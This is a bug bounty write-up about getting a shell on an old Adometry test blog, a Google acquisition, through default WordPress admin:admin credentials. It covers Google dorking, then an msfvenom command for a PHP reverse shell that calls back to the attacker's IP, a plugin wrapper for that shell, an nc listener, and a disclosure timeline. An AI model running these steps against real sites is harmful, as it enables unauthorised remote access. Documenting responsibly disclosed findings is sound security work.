
Getting a shell on a Google Acquisition


Default Wordpress credentials on an old version of the Adometry blog would have allowed an attacker to upload a PHP shell and execute remote commands.

Google dorking

Instead of studying for the exams last month I tryed to discover some bugs in a Google Acquisition to get my name listed on the Google Hall of Fame. The acquisition which I have targeted is Adometry by Google a SaaS-based marketing attribution and optimization platform. Looking around on their website I have discovered the company blog located at which runs the latest version of Wordpress. Since the bugs are often located in hidden and old pages of the website let’s give them a look. A very useful way to discover these pages is Google itself. Using some operands like site: or inurl: and combining these with the interval of dates filter it is possible to discover old pages of a particular website. Let’s try it: and set the interval of date in the past but not that much. Besides the pages which simply redirect to the main website I have noticed something strange:

The Wordpress test blog

The first thing that I have noticed was the title of the blog Test | Just another WordPress site - Adometry which contains the magic keyword that every Penetration Tester/Bug Hunter is looking for: Test that in many cases means vulnerable as hell. The second thing that I have noticed is that the url of this blog is different from the official one that I have discovered before. By inspecting the source code of the page I discovered that the Wordpress version was the 3.5.1 that has a lot of vulnerabilities like XSS XXE CSRF and maybe a RCE, but I am a lazy guy, out there it was very hot, and I would like to go for a swim so I tryed to find an easier way in. I know for sure this was just a testing blog and so what are the classical credetials for a testing thing? The default ones and in the case of Wordpress the classical admin:admin. Let’s give them a shot and here we are:

Getting a shell

The easiest way to get a shell once you have admin access to a Wordpress blog is to upload a custom plugin containing a reverse shell, enable it and visit the page which runs it:

  • Create a php reverse shell using msfvenom and name the file shell.php:

msfvenom -p php/meterpreter_reverse_tcp LHOST=Your IP LPORT=Your Port -f raw > shell.php

  • Add comments on the top of the shell.php to make it a valid plugin and compress it in zip format
*     Plugin Name: My Shell
*     Plugin URI:
*     Description: Execute Commands as the webserver you are serving wordpress with
*     Author: r0rshark
*     Version: 0.2
*     Author URI:
*                             */
    $ipaddr='Your IP';
    $port=Your Port;

      @set_time_limit(0); @ignore_user_abort(1); @ini_set('max_execution_time',0);
  • Upload and enable the plugin in the Wordpress dashboard
  • Setup a listener at your ip and port used in the msfvenom command:

nc -lvp port

  • Execute the reverse shell by visiting

Maybe getting root

In the previous picture it is possible to see the current kernel version running on that machine which is the 2.6.32. I think that there are known public exploits to get a root shell exploiting vulnerabilities in this kernel version. For example I have tested this on a 2.6.31 kernel and since the exploit has been created to work with kernel < 2.6.37 I suppose that it can work as well. Obviously I haven’t tried it because I think this would go beyond of the Bug Bounty scope.

  • 1 July 2015 Vulnerability reported to the Google Security Team
  • 2 July 2015 Vulnerability patched
  • 9 July 2015 Got reward of $5000